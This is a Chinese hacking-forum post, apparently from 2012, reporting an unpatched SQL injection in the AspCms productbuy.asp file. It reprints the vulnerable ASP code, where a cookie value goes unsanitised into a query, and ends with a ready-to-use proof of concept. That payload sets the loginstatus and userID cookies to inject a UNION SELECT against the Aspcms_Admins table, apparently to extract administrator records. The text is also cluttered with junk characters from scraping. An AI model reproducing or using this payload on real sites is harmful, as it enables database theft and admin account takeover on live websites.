好久没上土司了,上来一看发现在删号名单内.....; G( s8 o$ p! I
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
( F+ |+ e4 h R# X1 P: R, `$ E废话不多说,看代码:
# H4 `! B3 ? C+ e1 Q" W) k$ s/ p' @' c a
<%
M9 X, x4 _# J) t3 m" V7 z, e$ S, q' t8 z4 z8 v( P2 w8 N& p$ G7 @: |
if action = "buy" then* f& h. m6 a/ O$ X/ V4 S0 s
; d; r4 G; a. A2 g addOrder()
, R$ C1 R6 m6 g( [% x9 n0 i! S+ Z6 \: ^5 s/ D7 Z0 p1 I
else
1 ~, A8 P+ q4 z% ~9 R8 M
8 F+ ]9 @" A& H* ?" A echoContent()
, h) C5 m/ H: K0 D- M! w2 e4 `3 F. ?0 z6 z- @9 _6 ~0 N& o0 D1 u; [
end if* u1 c1 E4 p8 }! D4 `7 ]
P) t1 G5 C+ t$ s
/ [# o- Y; y6 n. ~2 _/ u4 ?7 m
+ W3 l1 g- d! j8 e' K& r9 L6 f" a……略过/ ` g$ L. t7 ^$ r8 k* l: e
% U# e+ s* P5 p w- O) y. V
# }2 d2 T( l1 N7 l$ \' C* d: Z6 k" g9 ~7 g
Sub echoContent()! p+ T5 e) u! a: f, J$ e9 i4 p! V
1 @* k0 i8 ]" u( }: s: A1 l- k! h$ G& ]
dim id5 V5 [! ^- Y* a6 J: V' t* {
* m6 U1 L' B6 X9 W2 s
id=getForm("id","get")
6 _! ^. p8 d) |: L
7 k/ q2 r0 p% [- z/ O5 O ' t e# g6 j* i2 p8 e2 d
5 {( \6 m& A+ S! h( s2 F) F/ Z( L
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
3 r) X; B, f0 P5 T- V! `& G+ H- [& T- I3 {' {8 ]
& Q B+ w% T% E# ]4 g
& K5 Q4 X. R4 r4 |2 K* E" ? dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
0 Q6 d( J1 P: b* B3 C1 X0 H. F, a1 E; B+ A' ^. Y" _9 ]
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
9 N9 H: o, e; h/ J: z4 U' Y* q, {) R3 ]" j7 M
Dim templatePath,tempStr- M& t2 {% G* b4 Y! s
7 z5 A, h# W& M/ S3 u4 l, K
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"$ I+ [ d( v; m
' |7 {1 a X2 x. n7 b
4 H$ c; k* }& R3 u
& U* S5 [% V( M: f1 n( R: F set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
1 X9 a2 b6 d- m, B p' v q
$ b3 R& `* ?2 D) P% _7 Q selectproduct=rsObj(0)# `" S* c& D& A& {% _0 G: H
) B% t8 J+ e9 g2 U& I' l3 \
, X' }! q$ P) z \3 N% Y
! Q5 C1 L9 [' N6 n- ]8 l; G Dim linkman,gender,phone,mobile,email,qq,address,postcode
# ]. G2 M) d/ d* R' w% ?. }
; F `$ {/ z3 Z/ |& l |, @ if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
; h" d' ?0 E3 }/ u+ L' ^3 A2 I8 W7 j# M9 i# n
if rCookie("loginstatus")=1 then 5 [) j; U, Z. F. o3 X/ z( E
2 Y/ j! M; v) I. e; C
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
. `! p' O; S( k0 N% t+ D C% w( o0 I
linkman=rsObj("truename"), G! X- S4 Q8 D
8 L W+ N/ n0 X' [
gender=rsObj("gender")
: P2 F- ~ r1 _' q: ~# t: X7 u- W7 c
9 H3 }; D4 w5 |) p2 \3 d phone=rsObj("phone")
! ~( k$ a( e' z
4 E q* t" D d- \9 X" {' l' Z& O mobile=rsObj("mobile")
& X+ b6 k" N: P0 }8 B- A9 u! |( v D L9 |6 m
email=rsObj("email"); A2 Q6 N/ F, t3 i
7 h3 V3 B% X* C" ?" `! L qq=rsObj("qq")
# p2 x9 _1 r8 H9 i) V' S( [, Q: U! x2 `+ T1 F5 K/ K
address=rsObj("address")
$ [+ x2 s3 @( Q# Q1 d+ r7 V0 s8 m& x9 `) x3 ^/ y
postcode=rsObj("postcode")
# G% {) O+ J e4 z6 x* {- R i* M5 B+ g3 y3 E" ^
else
& ]) M8 N# u+ S; p Y$ n9 ^& M
! R" V4 c: l# G3 c* h; m gender=12 n* f* m7 h2 T1 y
% C& T3 ~* ^* m) m
end if
+ C1 e* X4 N! Q7 G( Y2 P$ v* K
$ b0 h) n _0 [; X7 { rsObj.close()
% o) h4 h9 I) g7 z+ O8 s- y% Z' q- W! w6 L) }, d; i
4 ]& J& v6 h- o6 T+ V `) R
: K$ y4 v) g2 A7 w with templateObj ; v# W+ B: C8 u
" ?+ r; s: K o# T" m, f .content=loadFile(templatePath)
- X) \: h! ^2 ~2 [ l o! q) f) J* _+ j) V: b7 [' \0 X4 |* E6 x' k
.parseHtml()
* ]9 j+ S0 z- L+ e0 y7 u0 v, ?8 ?: s
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)8 k7 i( Q% ]1 I
* n6 |* Z! J! P& C3 I. O [! j .content=replaceStr(.content,"[aspcms:linkman]",linkman)
1 I. n: a0 m4 j' |
, v2 ^+ o: n1 {2 s .content=replaceStr(.content,"[aspcms:gender]",gender) + E( {0 U! j: s% [" P
' s* x7 `& W* O( b! ?0 z, ` .content=replaceStr(.content,"[aspcms:phone]",phone) 2 P9 d9 C d3 S! n8 _
$ J3 P% z% s K& _7 e" w+ T .content=replaceStr(.content,"[aspcms:mobile]",mobile) 8 z$ t$ ~8 [2 k- V! O& s1 T
: D1 i6 y& b+ t .content=replaceStr(.content,"[aspcms:email]",email)
$ Y( g& i) ~( q; \
% U2 f: U% V3 t) c1 r: K .content=replaceStr(.content,"[aspcms:qq]",qq) ! _$ u% L: w: W2 N- P) g4 H$ {
8 Z X; a, V6 [, X+ y# B- g& k% r/ E: Z2 H
.content=replaceStr(.content,"[aspcms:address]",address)
: H& A3 v+ n5 _# w5 S
9 A$ t5 C- r( x+ b( U& u) F .content=replaceStr(.content,"[aspcms:postcode]",postcode)
) L. _( `" G6 |% P7 Y
3 O B4 W9 e' z# j .parseCommon() : T @: ~( [1 c" P7 V/ P! Z
. ]! _& L0 I k u
echo .content . I+ [" n2 D0 b3 t2 {& G; _
2 e0 i7 u! A8 Y& @/ E
end with# b6 k! U2 ]$ Q) n, x! i
1 T/ @7 B3 g6 { E9 t2 K set templateobj =nothing : terminateAllObjects
, L x5 X- }! l1 z0 X& C# ~6 r" ^
v) t) G2 M! B( t0 a9 H, B- gEnd Sub3 J) O# V& U- F* F: Y- P+ Q. d( a' o
漏洞很明显,没啥好说的5 `6 t6 @9 |9 W! U4 F
poc:" r5 \: |( g j8 U& u
8 q4 b% @- P. b8 t2 {javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子% o& ?5 T6 O! U! d& O' ]9 ~
[* B2 n# | T, E& N
|
发表于 2012-12-27 08:35:05
收藏
支持
反对